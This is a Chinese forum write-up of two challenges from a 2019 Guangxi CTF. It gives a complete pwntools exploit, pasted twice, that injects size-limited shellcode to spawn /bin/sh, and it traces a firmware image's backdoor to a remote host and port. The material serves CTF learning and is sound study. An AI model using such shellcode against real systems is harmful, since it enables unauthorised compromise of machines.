-
-
[原创]广西首届网络安全选拔赛 一个简单的 shellcode pwn题 一个 固件re题
-
发表于: 2019-6-8 13:20
-
这个本来我是发到csdn 博客上面了 但是今天发现了 能够买 邀请码了 然后就买了一个邀请码 然后 发个帖子和大家交流一下技术(浅显技术 大牛还请绕道)
第一次发技术交流帖 哪里有问题还请 告知 谢谢
这个题 唯一的难点就是 shellcode 的 只是给了 0x14的大小
然后我们看一下 程序的大概内容 由于这个程序的特殊性 没办法 f5 然后我把这个程序的 call eax 搞成nop 就可以了 但是那个 return 应该是call
然后我们看一下 程序的大概内容 由于这个程序的特殊性 没办法 f5 然后我把这个程序的 call eax 搞成nop 就可以了 但是那个 return 应该是call
shellcode 一般 大小都是 0x21 这里 我们想办法 把 这个0x14改一下 改的大一点就可以了 exp 在下面 感觉exp 写的很明白 这里就不多讲了
import sys
from pwn import *
#context.log_level='debug'
#context.arch='amd64'
if len(sys.argv)==1 :
io=process('./pwn_1')
elf=ELF('./pwn_1')
#libc=ELF('')
pay='\xC7\x44\x24\x08\x44\x00\x00\x00'
#mov dword ptr [esp + 8], 0x44
pay+=asm("push 0x0804848E")
pay+=asm("ret")
print len(pay)
#gdb.attach(io,'b *0x080484CB')
io.sendline(pay)
io.recv()
pay=asm("push 0xb")
pay+=asm("pop eax")
pay+=asm("cdq")
pay+=asm("push edx")
pay+=asm("sub ebp,8")
pay+=asm("mov ebx,ebp")
pay+=asm("xor ecx,ecx")
pay+=asm("int 0x80")
pay=pay.ljust(0x21,'a')
pay+='/bin/sh\x00'
print len(pay)
io.sendline(pay)
#pause()
io.interactive()import sys
from pwn import *
#context.log_level='debug'
#context.arch='amd64'
if len(sys.argv)==1 :
io=process('./pwn_1')
elf=ELF('./pwn_1')
#libc=ELF('')
pay='\xC7\x44\x24\x08\x44\x00\x00\x00'
#mov dword ptr [esp + 8], 0x44
pay+=asm("push 0x0804848E")
pay+=asm("ret")
print len(pay)
#gdb.attach(io,'b *0x080484CB')
io.sendline(pay)
io.recv()
pay=asm("push 0xb")
pay+=asm("pop eax")
pay+=asm("cdq")
pay+=asm("push edx")
pay+=asm("sub ebp,8")
pay+=asm("mov ebx,ebp")
pay+=asm("xor ecx,ecx")
pay+=asm("int 0x80")
pay=pay.ljust(0x21,'a')
pay+='/bin/sh\x00'
print len(pay)
io.sendline(pay)
#pause()
io.interactive()然后就是那个 固件re了 一看是 bin文件 需要 用 binwalk 还有 /firmware-mod-kit
[~]$ binwalk -e '/home/pipixia/桌面/CTF.bin' DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 TP-Link firmware header, firmware version: 1.-20432.3, image version: "", product ID: 0x0, product version: 155254791, kernel load address: 0x0, kernel entry point: 0x80002000, kernel offset: 4063744, kernel length: 512, rootfs offset: 772784, rootfs length: 1048576, bootloader offset: 2883584, bootloader length: 0 69424 0x10F30 Certificate in DER format (x509 v3), header length: 4, sequence length: 64 94080 0x16F80 U-Boot version string, "U-Boot 1.1.4 (Aug 26 2013 - 09:07:51)" 94256 0x17030 CRC32 polynomial table, big endian 131584 0x20200 TP-Link firmware header, firmware version: 0.0.3, image version: "", product ID: 0x0, product version: 155254791, kernel load address: 0x0, kernel entry point: 0x80002000, kernel offset: 3932160, kernel length: 512, rootfs offset: 772784, rootfs length: 1048576, bootloader offset: 2883584, bootloader length: 0 132096 0x20400 LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 2203728 bytes 1180160 0x120200 Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 2774624 bytes, 519 inodes, blocksize: 131072 bytes, created: 2015-04-13 09:35:04 [~]$ cd f cd: 没有那个文件或目录: f [~]$ cd firmware-mod-kit [~/firmware-mod-kit]$ ls *[master] build-firmware.sh firmware_mod_kit_version.txt shared.inc check_for_upgrade.sh ipkg_install_all.sh shared-ng.inc cleanup.sh ipkg_install.sh squashfs-root creating_ipkg_packages.htm ipkg_remove_all.sh src ddwrt-gui-extract.sh ipkg_remove.sh trunk ddwrt-gui-rebuild.sh ipk_template uncpio.sh extract-firmware.sh old-build.sh uncramfs_all.sh firmware_mod_kit.htm old-extract.sh unsquashfs_all.sh [~/firmware-mod-kit]$ ./unsquashfs_all.sh '/home/pipixia/桌面/_CTF.bin.extracted/120200.squashfs' ./unsquashfs_all.sh: 行 85: ./src/binwalk: 没有那个文件或目录 Attempting to extract SquashFS .X file system... Trying ./src/squashfs-2.1-r2/unsquashfs... Trying ./src/squashfs-2.1-r2/unsquashfs-lzma... Trying ./src/squashfs-3.0/unsquashfs... Trying ./src/squashfs-3.0/unsquashfs-lzma... Trying ./src/squashfs-3.0-lzma-damn-small-variant/unsquashfs-lzma... Trying ./src/others/squashfs-2.0-nb4/unsquashfs... Trying ./src/others/squashfs-3.0-e2100/unsquashfs... Trying ./src/others/squashfs-3.0-e2100/unsquashfs-lzma... Trying ./src/others/squashfs-3.2-r2/unsquashfs... Trying ./src/others/squashfs-3.2-r2-lzma/squashfs3.2-r2/squashfs-tools/unsquashfs... Trying ./src/others/squashfs-3.2-r2-hg612-lzma/unsquashfs... Trying ./src/others/squashfs-3.2-r2-wnr1000/unsquashfs... Trying ./src/others/squashfs-3.2-r2-rtn12/unsquashfs... Trying ./src/others/squashfs-3.3/unsquashfs... Trying ./src/others/squashfs-3.3-lzma/squashfs3.3/squashfs-tools/unsquashfs... Trying ./src/others/squashfs-3.3-grml-lzma/squashfs3.3/squashfs-tools/unsquashfs... Trying ./src/others/squashfs-3.4-cisco/unsquashfs... Trying ./src/others/squashfs-3.4-nb4/unsquashfs... Trying ./src/others/squashfs-3.4-nb4/unsquashfs-lzma... Trying ./src/others/squashfs-4.2-official/unsquashfs... Parallel unsquashfs: Using 4 processors Trying ./src/others/squashfs-4.2/unsquashfs... Parallel unsquashfs: Using 4 processors Trying ./src/others/squashfs-4.0-lzma/unsquashfs-lzma... Parallel unsquashfs: Using 4 processors 480 inodes (523 blocks) to write [=====================================================\ ] 454/523 86% created 341 files created 39 directories created 70 symlinks created 0 devices created 0 fifos File system sucessfully extracted! MKFS="./src/others/squashfs-4.0
然后在这里就完成了 在 ./squashfs-root/tmp/
里面有个
backdoor
应该就是题目提示的后门了
我拖入ida 里面发现有upx壳 然后一个命令直接脱了
查找 可疑字符串 发现了echo.byethost51.com
查看 引用处
看到这里 再加上函数名 服务器 网址我们就找到了 就是
echo.byethost51.com:36667
附件在下面 有错误还望指教 谢谢~~
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
